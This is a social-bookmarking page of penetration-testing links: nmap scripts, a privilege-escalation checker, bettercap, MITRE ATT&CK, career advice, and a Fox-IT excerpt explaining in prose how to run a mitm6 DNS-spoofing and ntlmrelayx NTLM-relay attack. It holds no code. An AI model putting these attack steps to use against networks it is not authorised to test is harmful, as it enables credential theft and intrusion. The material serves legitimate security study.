pentest   3240

« earlier    

smb2-vuln-uptime NSE Script
Attempts to detect missing patches in Windows systems by checking the uptime returned during the SMB2 protocol negotiation.

SMB2 protocol negotiation response returns the system boot time pre-authentication. This information can be used to determine if a system is missing critical patches without triggering IDS/IPS/AVs.

Remember that a rebooted system may still be vulnerable. This check only reveals unpatched systems based on the uptime, no additional probes are sent.
smb  pentest  nmap  nse  vulnerability  scanner 
yesterday by whip_lash
http-form-brute NSE Script
Performs brute force password auditing against http form-based authentication.
namp  nse  pentest  webapp  bruteforce 
yesterday by whip_lash
GitHub - dzonerzy/winescalation: Python based module to find common vulnerabilities which lead to Windows privilege escalation
This is a Python based module for fast checking of common vulnerabilities affecting windows which lead to privilege escalation
python  windows  privilegeescalation  privesc  pentest  security 
2 days ago by whip_lash
evilsocket/bettercap: A complete, modular, portable and easily extensible MITM framework.
bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.
github  security  pentest  mitm 
3 days ago by whip_lash
mitm6 – compromising IPv4 networks via IPv6 | Fox-IT International blog
Running the attack itself is quite straightforward. First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network. For the second part of our attack, we use our favorite relaying tool, ntlmrelayx. This tool is part of the impacket Python library by Core Security and is an improvement on the well-known smbrelayx tool, supporting several protocols to relay to. Core Security and Fox-IT recently worked together on improving ntlmrelayx, adding several new features which (among others) enable it to relay via IPv6, serve the WPAD file, automatically detect proxy requests and prompt the victim for the correct authentication. If you want to check out some of the new features, have a look at the relay-experimental branch.

To serve the WPAD file, all we need to add to the command prompt is the host is the -wh parameter and with it specify the host that the WPAD file resides on. Since mitm6 gives us control over the DNS, any non-existing hostname in the victim network will do. To make sure ntlmrelayx listens on both IPv4 and IPv6, use the -6 parameter. The screenshots below show both tools in action, mitm6 selectively spoofing DNS replies and ntlmrelayx serving the WPAD file and then relaying authentication to other servers in the network.

hash  relay  ipv6  mitm  pentest  security 
6 days ago by whip_lash
10 common mistakes aspiring/new pentesters make – PentesterLab
Reversing and writing exploits are amazing things to do and you should definitely look into these two domains. However, if you want to break into infosec and score your first job, you need to be good at web (and mobile and network to a lesser extend) security. Most pentesting companies have a lot of their workload composed of web testing and this is not going to change in the next few months. Furthermore, they also have seniors people who are dying to do more research and will probably have priority on all the reversing/exploit writing jobs. So if you want to increase your likelihood of getting hired, you need to become a gun at web pentesting.

pentest  jobs  career 
7 days ago by whip_lash
MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected.
security  mitre  dfir  pentest  reference  ttp 
9 days ago by plaxx

« earlier    

related tags

2017  34c3  activedirectory  analysis  appsec  apt  archive  arducky  arduino  audit  automation  av-bypass  awesome  backlog  bestpractices  bladwijzerbalk  bloodhound  bruteforce  bugbounty  bugtracking  buildserver  bypass  c&c  c  c2  career  ces2018  cheatsheet  cia  cli  collection  command-injection  communication  computer_security  container  ctf  cybersecurity  database  devops  dfir  dns  documentation  domain  dropper  egghunter  email  enumeration  exam  execution  exploit  forensics  framework  fuzzing  gadget  general  github  hack  hacker  hacking  hacks  hardware  hash  hashes  holidayhackchallenge  important  infosec  injection  integration  internet  ipv6  javascript  jobs  labs  library  lint  linux  malware  management  metasploit  microsoft  mimikatz  mitm  mitre  namp  network  networking  news  nfc  nmap  nse  office  one-lin3r  openwrt  oscp  password  passwords  payload  pcap  pdf  penetration  pentesting  persistence  php  physical  pivoting  postexploitation  powershell  preload  preparation  privesc  privilege_escalation  privilegeescalation  programming  publication  python  qemu  redteam  reference  relay  reporting  resource  resources  responder  rfid  sans  scanner  seclists  security  securitypenetrationtesting  shellcode  shop  smb  spy  sql  sqli  sqlmap  ss7  ssl  ssrf  ssti  stego  story  study  styleguide  subdomains  talk  telecomm  template  testing  tls  tool  tools  ttp  uac  unittest  versioning  video  videos  volatility  vulnerabilities  vulnerability  waf  webapp  wifi  windows  working   

Copy this bookmark: